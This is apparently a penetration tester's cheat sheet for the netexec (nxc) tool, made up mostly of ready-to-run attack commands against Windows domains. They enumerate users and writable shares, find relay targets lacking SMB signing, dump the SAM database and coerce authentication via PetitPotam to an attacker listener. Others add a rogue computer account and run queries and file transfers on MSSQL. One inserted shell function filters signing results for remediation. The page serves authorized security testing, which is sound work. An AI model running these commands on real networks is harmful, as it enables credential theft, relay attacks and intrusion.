netexec (nxc)

nxc "is a network service exploitation tool that helps automate assessing the security of large networks."

Basic SMB auth

nxc smb somehost -u user -p 'Winter2027!'

Basic SMB auth (Kerberos)

I like to use getTGT, then export KRB5CCNAME=user.ccache. Here are some enumeration examples:

# Enumerate domain users
nxc ldap domain.com --use-kcache --kdcHost domain.com --users

Turn on logging

To log every nxc command and output to a file, find the nxc.conf file (in my Kali it was at /home/kali/.nxc/nxc.conf) and enable logging:

log_mode = True

Change the Pwn3d label

You can make that something more professional if you want - just edit the /home/kali/.nxc/nxc.conf file and change:

pwn3d_label = Compromised!

Find shares

nxc smb pcs.txt -u 'username' -p 'password' --shares

Filtering shares

For example, to list only the shares where you have READ or WRITE access:

nxc smb pcs.txt -u 'username' -p 'password' --shares --filter-shares READ WRITE

Or just WRITE:

nxc smb pcs.txt -u 'username' -p 'password' --shares --filter-shares WRITE

Cleaning up share list from log file

If you've turned on logging (see top of this page) here's a way to grep out just the shares you have WRITE access to. This is helpful if you want to try and drop tricky farmer payloads.

grep -i write log_2024-08-24-22-17-32.log | awk '{print $9,$10}' | sort > shares-i-can-write-to.txt

Find hosts with/without SMB signing

nxc smb pcs.txt -u '' -p '' --gen-relay-list nosigning.txt

Find hosts with/without SMB signing (alternate way)

Save the output to a file so you can grep it for anything where signing is set to false:

nxc smb pcs.txt -u '' -p '' > signingcheck.txt

If you want to get kind of fancy-pantsy you can take that grep to the next level by pulling out all hosts with SMB signing disabled and sorting by the host name:

cat signingcheck.txt | grep -i "signing:False" | awk '{print $0 " " $4}' | sort -k4,4 > no-signing-for-these-folks.txt
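The same filtering as a reusable shell function that produces a de-duplicated hostname,ip,SMBv1 list you can hand over for remediation (enforcing SMB signing). This is an added example, not from the original page or the NetExec project; the function names, the sample lines and the assumed output layout (SMB, IP, port, hostname, then the parenthesised flags) are constructed for illustration.

```shell
#!/bin/sh
# Added example: turn saved `nxc smb` output into a list of hosts that do not
# require SMB signing. Assumed line layout (check against your nxc version):
#   SMB <ip> <port> <hostname> [*] <os> (name:..) (domain:..) (signing:False) (SMBv1:..)

# Constructed sample output so the script runs offline.
sample_output() {
cat <<'EOF'
SMB         10.0.5.11       445    WS-FINANCE01     [*] Windows 10.0 Build 19041 x64 (name:WS-FINANCE01) (domain:corp.example) (signing:False) (SMBv1:False)
SMB         10.0.5.10       445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:corp.example) (signing:True) (SMBv1:False)
SMB         10.0.5.23       445    FS02             [*] Windows Server 2012 R2 Standard 9600 x64 (name:FS02) (domain:corp.example) (signing:False) (SMBv1:True)
SMB         10.0.5.11       445    WS-FINANCE01     [*] Windows 10.0 Build 19041 x64 (name:WS-FINANCE01) (domain:corp.example) (signing:False) (SMBv1:False)
EOF
}

# Reads nxc smb output on stdin and prints "hostname,ip,smbv1" for each unique
# host reporting signing:False, sorted by hostname.
hosts_without_signing() {
  awk '
    # Strip ANSI colour codes in case the output was captured from a terminal.
    { gsub(/\033\[[0-9;]*m/, "") }
    $1 == "SMB" && tolower($0) ~ /\(signing:false\)/ {
      smbv1 = "unknown"
      # Pull the value out of "(SMBv1:<value>)" wherever it sits on the line.
      if (match($0, /\(SMBv1:[A-Za-z]+\)/))
        smbv1 = substr($0, RSTART + 7, RLENGTH - 8)
      print $4 "," $2 "," smbv1
    }' |
  sort -t, -k1,1 -u
}

# Demo run on the constructed sample; for real data use:
#   hosts_without_signing < signingcheck.txt
sample_output | hosts_without_signing
```

Hosts that also show SMBv1 as True are worth putting at the top of the remediation list.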

Find hosts running WebClient service

nxc smb somecomputer.domain.com -u lowpriv -p 'yerpassw0rd' -M webdav

Find pre-created computer accounts

nxc ldap somecomputer.domain.com -u lowpriv -p 'winter2026' -M pre2k

Dump SAM database

nxc smb VICTIM -u lowpriv -p 'Winter2026!' --sam

Coerce authentication

The nxc wiki has an interesting page on this - talking about the various ways nxc can coerce authentication.

Note: instead of using the METHOD option, you can use its short form M. Similarly, the argument LISTENER can be shortened to L.

This also applies to the names of the vulnerabilities when specifying a method.

M=p // Invalid, as both petitpotam and printerbug start with ‘p’, so the module gives an error

M=pr // Matches printerbug

M=pe // Matches petitpotam

M=dfs // Matches dfscoerce

Coerce via PetitPotam:

nxc smb SOMEHOST -u user -p 'pass' -M coerce_plus -o LISTENER=MY.KALI.IP.ADDRESS METHOD=pe

Add computer to the domain

nxc smb domain.com -u arnold -p JingleAllTheWay -M add-computer -o NAME=YOURMOM PASSWORD=Omglol123!

MSSQL commands

Lifted from the nxc wiki

Execute database commands

nxc mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'

Get/put files

Get:

nxc mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --get-file C:\\some\\file\\in-a-subdirectory\\file..txt /tmp/file

Put:

nxc mssql 192.168.212.134 -u administrator -p October2022 --put-file /tmp/users C:\\Windows\\Temp\\whoami.txt